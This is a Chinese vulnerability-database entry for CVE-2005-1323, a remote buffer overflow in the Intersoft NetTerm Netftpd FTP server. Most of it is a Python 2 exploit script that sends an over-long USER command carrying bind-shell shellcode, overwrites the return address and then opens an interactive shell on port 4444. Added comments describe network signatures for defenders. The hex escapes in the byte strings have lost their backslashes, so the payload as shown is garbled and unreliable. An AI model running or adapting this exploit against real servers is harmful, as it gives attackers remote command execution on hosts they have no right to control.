Intersoft NetTerm Netftpd USER命令超长参数远程缓冲区溢出漏洞

Intersoft NetTerm Netftpd USER命令超长参数远程缓冲区溢出漏洞

漏洞ID 1108713 漏洞类型 缓冲区溢出
发布时间 2005-04-26 更新时间 2005-10-20
CVE编号 CVE-2005-1323
CNNVD-ID CNNVD-200505-616
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/955
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-616
|漏洞详情
Intersoft NetTerm Netftpd 是一款小型 FTP 服务程序，可在 Microsoft Windows 操作系统下使用。
|漏洞EXP
#
# Net-ftpd 4.2.2 user authentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#

import struct
import socket
import sys
import time

class warftpd:
	"""Proof-of-concept for CVE-2005-1323: NetTerm Netftpd 4.2.2 USER-command overflow.

	Despite the class name (which looks like a leftover from another tool),
	the only thing this code touches is the FTP USER handler: genbuffer()
	builds an over-long USER argument and exploit() delivers it, then tries
	TCP port 4444 on the same host for a shell.

	As rendered on this page every backslash in the byte strings has been
	stripped ('x41', 'xeb', ... instead of hex escapes), so string lengths
	and contents here are NOT what the author ran.  The listing is Python 2
	(print statements, 'except X, e' syntax).

	Defender notes: the wire signature is an FTP USER line of roughly
	self.bsize bytes consisting mostly of one repeated filler byte, followed
	within a few seconds by a new TCP connection to port 4444 on the FTP
	server; a crash of the daemon (the script's own failure message) is the
	other observable.
	"""
	def __init__(self, host, port):
		# host/port of the FTP service; every other field is a tunable that
		# the set*() methods below overwrite.
		self.host		= host
		self.port		= port
		# total length of the USER argument assembled by genbuffer()
		self.bsize		= 512
		# values written into the saved-EBP and return-address slots
		self.ebpaddr	= 0xcacacaca
		self.retaddr	= 0xdeadbeef
		# stored but never read anywhere in this listing
		self.sctype		= 'findskt'
		self.scport		= None

	def setebpaddr(self, addr):
		"""Set the 4-byte value packed into the saved-EBP slot."""
		self.ebpaddr = addr

	def setretaddr(self, addr):
		"""Set the return-address slot: an int is packed little-endian, a str is used as-is."""
		self.retaddr = addr

	def setbsize(self, size):
		"""Set the total length of the USER argument built by genbuffer()."""
		self.bsize = size

	def setsctype(self, type):
		"""Store the shellcode type label (unused by genbuffer()/exploit() in this listing)."""
		self.sctype = type

	def setscport(self, port):
		"""Store a shellcode port value (unused; exploit() hard-codes 4444)."""
		self.scport = port

	def genbuffer(self):
		"""Return the USER command string to send.

		Layout: "USER " + nops + sc + 46 x 'x42' + packed EBP + return
		address.  Because nops is sized as bsize - len(sc) - 50, the part
		after "USER " is exactly self.bsize characters long.  In the
		author's original each 'xNN' token was one byte; in this rendering
		it is three characters, so the real lengths differ.
		"""
		## 
		# Alpha port bind 4444, thanx metasploit
		## 
		# Bind-shell payload (alphanumeric encoded, per the author's comment);
		# the hard-coded listening port 4444 is what exploit() connects to.
		sc = "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
		sc += "x49x49x49x49x49x49x49x49x49x49x37x49x51x5ax6ax46"
		sc += "x58x30x41x31x50x42x41x6bx42x41x56x42x32x42x41x32"
		sc += "x41x41x30x41x41x58x50x38x42x42x75x69x79x6bx4cx70"
		sc += "x6ax78x6bx70x4fx6dx38x59x69x49x6fx69x6fx6bx4fx61"
		sc += "x70x4cx4bx70x6cx35x74x66x44x6cx4bx73x75x45x6cx4c"
		sc += "x4bx31x6cx55x55x62x58x54x41x38x6fx6ex6bx50x4fx57"
		sc += "x68x4cx4bx33x6fx65x70x56x61x38x6bx69x73x50x30x37"
		sc += "x39x6cx4bx50x34x4ex6bx77x71x58x6ex34x71x4bx70x4a"
		sc += "x39x6ex4cx6bx34x4fx30x64x34x35x57x6bx71x6bx7ax56"
		sc += "x6dx53x31x78x42x7ax4bx69x64x35x6bx32x74x61x34x76"
		sc += "x48x44x35x4dx33x4cx4bx63x6fx56x44x37x71x5ax4bx50"
		sc += "x66x6ex6bx66x6cx32x6bx4cx4bx31x4fx45x4cx75x51x38"
		sc += "x6bx34x43x76x4cx4cx4bx6bx39x72x4cx45x74x47x6cx63"
		sc += "x51x7ax63x45x61x4fx30x53x54x4ex6bx67x30x30x30x4c"
		sc += "x4bx63x70x34x4cx4ex6bx34x30x37x6cx4ex4dx4ex6bx71"
		sc += "x50x55x58x61x4ex73x58x6ex6ex70x4ex64x4ex68x6cx70"
		sc += "x50x4bx4fx6bx66x30x31x49x4bx50x66x52x73x53x56x30"
		sc += "x68x74x73x57x42x43x58x61x67x61x63x75x62x63x6fx36"
		sc += "x34x49x6fx58x50x45x38x4ax6bx4ax4dx39x6cx57x4bx56"
		sc += "x30x69x6fx5ax76x43x6fx4dx59x78x65x35x36x4cx41x48"
		sc += "x6dx66x68x37x72x71x45x62x4ax64x42x6bx4fx38x50x35"
		sc += "x38x6ex39x64x49x7ax55x4cx6dx31x47x79x6fx6ex36x56"
		sc += "x33x62x73x72x73x30x53x71x43x77x33x30x53x67x33x36"
		sc += "x33x59x6fx7ax70x30x66x70x68x76x71x73x6cx41x76x72"
		sc += "x73x6fx79x7ax41x4cx55x32x48x4cx64x44x5ax74x30x4a"
		sc += "x67x56x37x49x6fx4ax76x51x7ax44x50x42x71x53x65x6b"
		sc += "x4fx38x50x30x68x6fx54x4ex4dx44x6ex79x79x30x57x79"
		sc += "x6fx68x56x41x43x30x55x4bx4fx4ax70x52x48x4dx35x67"
		sc += "x39x6fx76x30x49x33x67x6bx4fx4ax76x72x70x63x64x61"
		sc += "x44x30x55x49x6fx38x50x4cx53x65x38x4bx57x72x59x6a"
		sc += "x66x63x49x72x77x69x6fx78x56x41x45x4bx4fx6ax70x70"
		sc += "x66x70x6ax63x54x61x76x30x68x43x53x72x4dx6cx49x68"
		sc += "x65x53x5ax70x50x53x69x76x49x6ax6cx6fx79x4dx37x61"
		sc += "x7ax67x34x4ex69x59x72x37x41x6bx70x6ax53x4cx6ax59"
		sc += "x6ex53x72x56x4dx59x6ex33x72x64x6cx6cx53x4ex6dx42"
		sc += "x5ax35x68x4cx6bx6ex4bx4ex4bx72x48x44x32x6bx4ex4d"
		sc += "x63x54x56x79x6fx43x45x32x64x6bx4fx6bx66x33x6bx53"
		sc += "x67x30x52x63x61x66x31x52x71x53x5ax74x41x56x31x32"
		sc += "x71x73x65x50x51x4bx4fx5ax70x32x48x6cx6dx4ax79x47"
		sc += "x75x48x4ex62x73x6bx4fx7ax76x61x7ax6bx4fx6bx4fx35"
		sc += "x67x6bx4fx68x50x6ex6bx31x47x4bx4cx6dx53x68x44x41"
		sc += "x74x4bx4fx4ex36x36x32x49x6fx68x50x75x38x6cx30x4f"
		sc += "x7ax56x64x31x4fx43x63x59x6fx4ax76x4bx4fx38x50x46"
		
		# shellcode
		# (alternative payload left commented out by the author; not used)
		#sc		=	"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66"
		#sc		+=	"x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6"
		#sc		+=	"x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa"
		#sc		+=	"x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f"
		#sc		+=	"x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb"
		#sc		+=	"x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba"
		#sc		+=	"x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb"
		#sc		+=	"xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc"
		#sc		+=	"xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61"
		#sc		+=	"x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70"
		#sc		+=	"x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44"
		#sc		+=	"x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7"
		#sc		+=	"x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69"
		#sc		+=	"xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9"
		#sc		+=	"xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0"
		#sc		+=	"x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3"
		#sc		+=	"x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7"
		#sc		+=	"x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0"
		#sc		+=	"xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67"
		#sc		+=	"x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1"
		#sc		+=	"xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0"
		#sc		+=	"x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88"
		#sc		+=	"x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d"
		#sc		+=	"xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95"
		#sc		+=	"x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2"
		# other stuff
		# filler sized so that the whole argument comes out at self.bsize;
		# 50 = 46 padding tokens + 4 (ebp) + 4 (ret) - but see the docstring
		# about token widths in this rendering
		nops	=	"x41"*(self.bsize-len(sc)-50)
		ebp	=	struct.pack('<L', self.ebpaddr)
		# check if the value is an integer, otherwise it should be a string
		# (isinstance(self.retaddr, int) would be the idiomatic form of this test)
		if self.retaddr.__class__.__name__ == 'int':
			ret	=	struct.pack('<L', self.retaddr)
		else:
			ret	=	self.retaddr
		# assemble buffer to send
		buffer	=	"USER "
		buffer	+=	nops
		buffer	+=	sc
		buffer	+=	'x42'*(50-4)
		buffer	+=	ebp
		buffer	+=	ret
		return buffer

	def exploit(self):
		"""Send the buffer from genbuffer() to host:port, then try the bind shell.

		Sequence: TCP connect, read up to 100 bytes of banner, sleep 1 s,
		send the payload, sleep 2 s, close.  After another 2 s a second
		connection is made to host:4444 and up to 1024 bytes are read; if
		that reply contains 'Microsoft Windows' a telnetlib session is
		attached to the socket, otherwise the daemon is assumed dead.
		Always returns None; all status goes through print statements.
		Several messages end in 'failedn' / '...n' - an escaped newline whose
		backslash was lost in rendering.  No FTP login ever completes; the
		USER line itself is the trigger.
		"""
		# connect
		skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			skt.connect((self.host, self.port))
		except socket.error, err:
			# err[1] is the human-readable errno text in Python 2
			print "[-] Error: %s" % err[1]
			return None
		print "[+] Connected to %s:%d" % (self.host, self.port)
		# recv banner
		print "[+] Receiving Banner"
		res = skt.recv(100)
		print res
		# send payload
		time.sleep(1)
		print "[+] Sending payload"
		skt.send(self.genbuffer())
		time.sleep(2) # test on mcafee anti-b0f
		skt.close()
		# if successfull connect to the shell
		# port 4444 is fixed by the payload in genbuffer(); self.scport is ignored
		time.sleep(2)
		skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			skt.connect((self.host, 4444))
		except socket.error, err:
			print "[-] Error: %s" % err[1]
			print "[-] Explotation failedn[-] Daemon should be dead..."
			return None
		print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
		res = skt.recv(1024)
		if res:
			# a cmd.exe banner is the success criterion
			if res.count('Microsoft Windows'):
				print "[+] Welcome my lord, i'm here to serve you ;) ...n"
				from telnetlib import Telnet
				telnet = Telnet()
				# reuse the already-connected socket instead of Telnet.open()
				telnet.sock = skt
				try:
					telnet.interact()
				except:
					# bare except: swallows every exception from interact(),
					# including KeyboardInterrupt and the EOFError telnetlib
					# raises when the peer closes
					pass
				skt.close()
				print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
				return None
		skt.close()
		print '[-] Explotation failednDaemon should be dead...'

if __name__ == '__main__':
	# Command-line entry point: exactly two positional arguments, host and port.
	if len(sys.argv) != 3:
		print "*************************************"
		print "* Coded by Sergio 'shadown' Alvarez *"
		# '[email protected]' is how the address appears in this rendering;
		# it looks like the hosting site's e-mail obfuscation, not the author's text
		print "*          [email protected]        *"
		print "*************************************"
		print "Usage: %s host port" % sys.argv[0]
		sys.exit(1)

	exp = warftpd(sys.argv[1], int(sys.argv[2]))
	# sctype/scport are stored by the class but never read by genbuffer() or
	# exploit() in this listing; the shell port is hard-coded to 4444 there
	exp.setsctype('findskt')
	exp.setscport(1234)
	# length of the USER argument genbuffer() will produce
	exp.setbsize(1014)
	exp.setebpaddr(0xdeadbeef) # sometimes needed, just in case
	# passed as a str, so genbuffer() appends it verbatim; with the backslashes
	# stripped in this rendering it is a plain 12-character string, not 4 bytes
	exp.setretaddr('x4cxfax12x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)
	exp.exploit()

# milw0rm.com [2005-04-26]
|参考资料

来源:XF
名称:netterm-netftpd-user-bo(20285)
链接:http://xforce.iss.net/xforce/xfdb/20285
来源:BID
名称:13396
链接:http://www.securityfocus.com/bid/13396
来源:BUGTRAQ
名称:20050426 ADV: NetTerm's NetFtpd 4.2.2 Buffer Overflow + PoC Exploit
链接:http://www.securityfocus.com/archive/1/396959
来源:www.securenetterm.com
链接:http://www.securenetterm.com/html/what_s_new.html
来源:OSVDB
名称:15865
链接:http://www.osvdb.org/15865
来源:VUPEN
名称:ADV-2005-0407
链接:http://www.frsirt.com/english/advisories/2005/0407
来源:SECUNIA
名称:15140
链接:http://secunia.com/advisories/15140

